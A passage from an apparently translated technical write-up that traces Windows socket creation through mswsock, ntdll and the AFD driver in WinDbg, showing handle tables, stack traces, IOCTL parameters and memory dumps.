<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 0xf6f368 – after execution of NtCreateFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f368 00000000 00000000 00f6f498 00000003 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f378 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00000144</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 00000022 D..........."...</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f388 00000000 00000144 c0140000 00000020 ....D....... ...</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f398 80000000 00000001 00000039 00000022 ........9..."...</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x144 - it is that handle which will be returned finally by the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">socket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function and which will be transferred to the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bind</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function as the first parameter. This handle is created by nt!ObpCreateHandle function caused from the nt! ObOpenObjectByNameEx (earlier when performing NtCreateFile).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd201`d9b6e820 fffff801`a72630e9 nt!ObOpenObjectByNameEx+0x310</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd201`d9b6e960 fffff801`a7262cf9 nt!IopCreateFile+0x3d9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd201`d9b6ea00 fffff801`a6fd4493 nt!NtCreateFile+0x79</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd201`d9b6ea90 00007ff9`e3f46b74 nt!KiSystemServiceCopyEnd+0x13</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`00e3e0a8 00000000`58f9ae28 ntdll!NtCreateFile+0x14</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before execution of function in the list of objects:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!handle 0 f ffffda8527121080</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">013c: Object: ffffca8986a9e3d0 GrantedAccess: 00020019 (Inherit) Entry: ffffca8985cb14f0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffca8986a9e3d0 Type: (ffffda852717d0e0) Key</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ObjectHeader: ffffca8986a9e3a0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HandleCount: 1 PointerCount: 32759</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Directory Object: 00000000 Name: \REGISTRY\MACHINE\SYSTEM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\NAMESPACE_CATALOG5</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0140: Object: ffffda85299be6f0 GrantedAccess: 001f0003 (Audit) Entry: ffffca8985cb1500</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda85299be6f0 Type: (ffffda8527087650) Event</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ObjectHeader: ffffda85299be6c0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HandleCount: 1 PointerCount: 1</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0144: free handle, Entry address ffffca8985cb1510, Next Entry ffffca8985cb1520</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0148: free handle, Entry address ffffca8985cb1520, Next Entry ffffca8985cb1530</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After execution of function new record appears:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!handle 0 f 0xffffe382ff528480 – ServerExample.exe process object</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0144: Object: ffffda8529a9bcf0 GrantedAccess: 0016019f (Audit) Entry: ffffca8985cb1510</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8529a9bcf0 Type: (ffffda852718cb00) File</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ObjectHeader: ffffda8529a9bcc0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HandleCount: 1 PointerCount: 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Directory Object: 00000000 Name: \Endpoint {Afd}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0148: free handle, Entry address ffffca8985cb1520, Next Entry ffffca8985cb1530</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="95" src="https://lh3.googleusercontent.com/G5seDSY8r9ol9vlVc6o8HfTjW7GKqD8emsej8qzHP4_6D4SpHrZHp8s1eqhwCC-dAY5Hzvli4Z4_bLqRuP5ujxL0q-BsgtbpjuHBDGWBU9hmzYmJ3UU_LjOYcpAnAhIGc9x1kdSf2FYBCU32qg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="323" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The instruction mov rax, [rpb-58h] puts in rax value of a the handle.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We return to usermode. Further there is mswsock!SockGetInformation call (from which there is ntdll!NtDeviceIoControlFile was called to which as handle of the file it is transferred earlier returned 0x144).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint). On the client there will be \Device\Afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, F6F2E0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 1207B – AfdDispatchImmediateIrp ()</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F2FC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F2FC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Input buffer:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc F6F2FC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f2fc 00000007 00f6f38c c0140000 00f6f348 ............H...</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IOCTL code - 1207Bh (afd!AfdDispatchImmediateIrp), but it will not be executed since the FastIO mechanism is involved (details further on the example of Send), afd!AfdFastIoDeviceControl will be executed, at the same time an IRP package is not formed, the usermode-buffer and its length are transferred as the 3rd and 4th parameter of this function</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx – \Endpoint {Afd} object</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000000f6f2fc </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000010</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After function execution (the result registers in the same buffer):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc F6F2FC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f2fc 00000007 00000000 00010000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further ntdll!NtDeviceIoControlFile function is caused repeatedly, in Input buffer data which were returned after the previous execution. But after repetition the result did not change. If function returned 103h, then mswsock! SockWaitForSingleObject would be caused, then ws2_32! WahInsertHandleContext, further an exit from mswsock!SockSocket also we come back to mswsock!WSPSocket. Entrance to mswsock!SockSetHandleContext. Further wshhyperv! WSHGetSocketInformation is caused, then nt!NtDeviceIoControlFile with IOCTL 12047h (AfdDispatchImmediateIrp)</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As the Input-buffer it is transferred (0xD4 – size of buffer):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 006FED58 006FED58+D4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f358 00000000 00000022 00000001 00000001 ...."...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f368 00000024 00000024 00000000 00000000 $...$...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f378 00000000 00010000 00010000 00001000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f388 00000000 000003e9 00020026 00000008 ........&.......</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f398 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3a8 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3b8 00000000 00000000 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1234191b 4ca74bf7</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ..........4..K.L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3c8 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">d7dfe086 45542bc3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000004 656b6361 .....+TE....acke</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3d8 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3e8 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f3f8 00000000 012247f0 00000000 00000000 .....G".........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f408 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f418 00000000 00000000 00000000 d2ffd7d3 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f428 00000022</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In output buffer (changes after execution mswsock!SockSetHandleContext did not happen)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 00F6F400 00F6F400+24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f400 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f410 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f420 00000000 d2ffd7d3 ........</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From there is ws2_32!WPUModifyIFSHandle call (ws2_32! WahInsertHandleContext, is caused, then goes work with the ws2_32!SockPrimes array). An exit from mswsock!SockSetHandleContext. We return to our application.</span></div>
<br /><ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
